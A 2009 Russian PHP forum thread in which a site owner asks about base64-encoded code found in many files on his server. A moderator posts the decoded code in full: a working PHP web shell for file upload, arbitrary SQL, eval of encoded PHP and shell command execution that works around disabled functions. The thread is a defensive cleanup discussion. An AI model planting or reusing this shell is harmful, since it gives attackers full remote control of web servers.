?eval(base64_decode

Тема в разделе "PHP", создана пользователем sava36, 31 авг 2009.

Статус темы:
Закрыта.
Модераторы: latteo
  1. sava36

    sava36 Постоялец

    Регистр.:
    13 мар 2007
    Сообщения:
    146
    Симпатии:
    29
    Ребята, помогите, кто силен в кодировке!
    У меня на сайте. щас сканирую фтп и уже нашел с десяток файлов с этим кодом:

    01.jpg

    Что за код и как с ним бороться! я в замешательстве! Помогите кто знает что и как?
    Сам код в приложении.
     

    Вложения:

    • intro.rar
      Размер файла:
      9,6 КБ
      Просмотров:
      7
  2. PhantomUA

    PhantomUA Инквизитор

    Moderator
    • Супермодератор
    Регистр.:
    2 июл 2006
    Сообщения:
    759
    Симпатии:
    1.640
    PHP:
    if ($_POST["action"] == "upload") {

        
    $l=$_FILES["filepath"]["tmp_name"];
        
    $newpath=$_POST["newpath"];
        if (
    $newpath!=""move_uploaded_file($l,$newpath);
        echo 
    "done";

    } else if (
    $_POST["action"] == "sql") {

        
    $query $_POST["query"];
        
    $query str_replace("\'","'",$query);
        
    $lnk mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' mysql_error());
        
    mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' mysql_error());
        
    mysql_query($query$lnk) or die ('Invalid query: ' mysql_error());
        
    mysql_close($lnk);
        echo 
    "done<br><pre>$query</pre>";

    } else if (
    $_POST["action"] == "runphp") {

        eval(
    base64_decode($_POST["cmd"]));

    } else {

        
    $disablefunc = @ini_get("disable_functions");
        if (!empty(
    $disablefunc)) {
            
    $disablefunc str_replace(" ","",$disablefunc);
            
    $disablefunc explode(",",$disablefunc);
        } else 
    $disablefunc = array();

        function 
    myshellexec($cmd) {
            global 
    $disablefunc;
            
    $result "";
            if (!empty(
    $cmd)) {
                if (
    is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}
                elseif ((
    $result = `$cmd`) !== FALSE) {}
                elseif (
    is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
                elseif (
    is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
                elseif (
    is_resource($fp = @popen($cmd,"r"))) {
                    
    $result "";
                    while(!
    feof($fp)) {$result .= @fread($fp,1024);}
                    @
    pclose($fp);
                }
            }
            return 
    $result;
        }
        
    $cmd $_POST["cmd"];
        echo 
    "<form method=post>";
        echo 
    "<input type=text name=cmd value='$cmd' size=150>";
        echo 
    "<input type=submit name=B_SUBMIT value='Go'>";
        echo 
    "</form>";
        if (
    $cmd != "") {
            echo 
    "<pre>";
            
    $cmd=stripslashes($cmd);
            echo 
    "Executing $cmd \n";
            echo 
    myshellexec("$cmd");
            echo 
    "</pre>";
            exit;
        }

    Думаю этого тебе точно не надо )))
     
  3. Atec

    Atec

    Регистр.:
    28 апр 2007
    Сообщения:
    296
    Симпатии:
    31
    Насколько я помню, где то на нуледе говорили что это лайт версия какого то шелла :).

    Удаляй короче и не парься:)
     
  4. sava36

    sava36 Постоялец

    Регистр.:
    13 мар 2007
    Сообщения:
    146
    Симпатии:
    29
    Так и сделал. удалил 23 файла. Ша пойду смотреть на "зеркало" на другом хосте, уже предвкушаю чистку и там!!!:smmne:
     
  5. juggernaut13

    juggernaut13 Постоялец

    Регистр.:
    23 авг 2009
    Сообщения:
    59
    Симпатии:
    16
    :bb: :bb: подсунули шелл
    в base64 обычно никто ничего хорошего не пихает в скриптах
    картинки в инстялляторах не в счет
     
Статус темы:
Закрыта.